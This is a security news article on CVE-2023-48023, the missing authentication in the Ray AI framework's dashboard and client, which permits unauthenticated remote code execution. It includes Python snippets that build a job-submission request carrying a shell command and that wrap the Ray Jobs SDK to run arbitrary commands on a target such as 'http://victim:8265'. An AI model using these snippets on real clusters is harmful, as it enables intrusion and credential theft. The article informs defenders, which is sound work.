
Critical Vulnerability Found in Ray AI Framework 

A critical issue in open source AI framework Ray could provide attackers with operating system access to all nodes.

A critical vulnerability in Ray, an open source compute framework for AI, could allow unauthorized access to all nodes, cybersecurity firm Bishop Fox warns.

Tracked as CVE-2023-48023, the bug exists because Ray does not properly enforce authentication on at least two of its components, namely the dashboard and client.

A remote attacker can abuse this issue to submit or delete jobs without authentication. Furthermore, the attacker could retrieve sensitive information and execute arbitrary code, Bishop Fox says.

“The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install),” the cybersecurity firm notes.

CVE-2023-48023 is rooted in the fact that, in its default configuration, Ray does not enforce authentication and does not appear to support any authorization model, although the framework’s documentation describes an optional mutual TLS authentication mode.

“In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray dashboard,” Bishop Fox says.
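For context, Ray’s documented mutual TLS mode is enabled through environment variables set on every node, along the lines of the sketch below (the certificate paths are placeholders). As Bishop Fox points out, this authenticates peers to one another but grants every authenticated user the same full access.

```shell
# Enable Ray's optional mutual TLS on each node (cert paths are placeholders).
export RAY_USE_TLS=1
export RAY_TLS_SERVER_CERT=/etc/ray/tls/server.crt  # this node's certificate
export RAY_TLS_SERVER_KEY=/etc/ray/tls/server.key   # this node's private key
export RAY_TLS_CA_CERT=/etc/ray/tls/ca.crt          # CA used to verify peers
```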

According to the cybersecurity firm, attackers could exploit CVE-2023-48023 via the job submission API, by submitting arbitrary operating system commands.
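The attack path described is straightforward because the dashboard’s job submission endpoint accepts an arbitrary shell entrypoint. The sketch below, using a placeholder dashboard address, only builds the request an attacker would send; it does not transmit it.

```python
import json
import urllib.request

# Hypothetical exposed dashboard address; Ray's dashboard listens on port 8265.
DASHBOARD = "http://127.0.0.1:8265"

def make_job_request(entrypoint: str) -> urllib.request.Request:
    # Ray's job submission endpoint takes an arbitrary shell "entrypoint";
    # with no authentication enforced, any peer that can reach the port
    # can have it executed on the cluster.
    body = json.dumps({"entrypoint": entrypoint}).encode()
    return urllib.request.Request(
        f"{DASHBOARD}/api/jobs/",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

req = make_job_request("id; hostname")
# Sending it (urllib.request.urlopen(req)) would run the command as the
# OS user the Ray head node runs under -- deliberately not done here.
```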

Ray’s lack of authentication leads to other security vulnerabilities as well, including issues recently disclosed by Protect AI, which operates Huntr, the bug bounty platform for AI and ML.


Bishop Fox says it independently identified two of these issues and reported them to Ray’s maintainers (Anyscale) around the same time as Protect AI.

“However, the reports were closed based on Anyscale’s position that unauthenticated remote code execution is intentional, and therefore should not be considered a vulnerability,” the cybersecurity firm says.

Furthermore, the company says, the Ray Jobs Python SDK can be used for unauthenticated remote code execution by crafting a malicious script that uses the Ray API for task submission. The Ray Client API can likewise be abused for unauthenticated remote code execution.
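A minimal sketch of the SDK path the firm describes, assuming the `ray` package is installed and an unauthenticated dashboard is reachable at a placeholder URL; the import is deferred so the snippet stays self-contained.

```python
def run_command(dashboard_url: str, command: str) -> str:
    """Submit an arbitrary shell command via Ray's Jobs Python SDK.

    Import is deferred so this sketch loads even without ray installed;
    actually using it requires `pip install "ray[default]"` and a
    reachable, unauthenticated Ray dashboard.
    """
    from ray.job_submission import JobSubmissionClient

    client = JobSubmissionClient(dashboard_url)   # no credentials required
    return client.submit_job(entrypoint=command)  # returns a job ID

# Example (not executed here): run_command("http://victim:8265", "whoami")
```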

Bishop Fox draws attention to other critical-severity vulnerabilities in Ray as well, including a server-side request forgery (SSRF) bug (CVE-2023-48022) and an insecure input validation flaw (CVE-2023-6021) that Protect AI reported to the vendor this summer.

At least some of these issues, the cybersecurity firm notes, remain unpatched, as the vendor either does not recognize them as security defects or does not want to address them.

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: US, UK Cybersecurity Agencies Publish AI Development Guidance

Related: CISA Outlines AI-Related Cybersecurity Efforts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

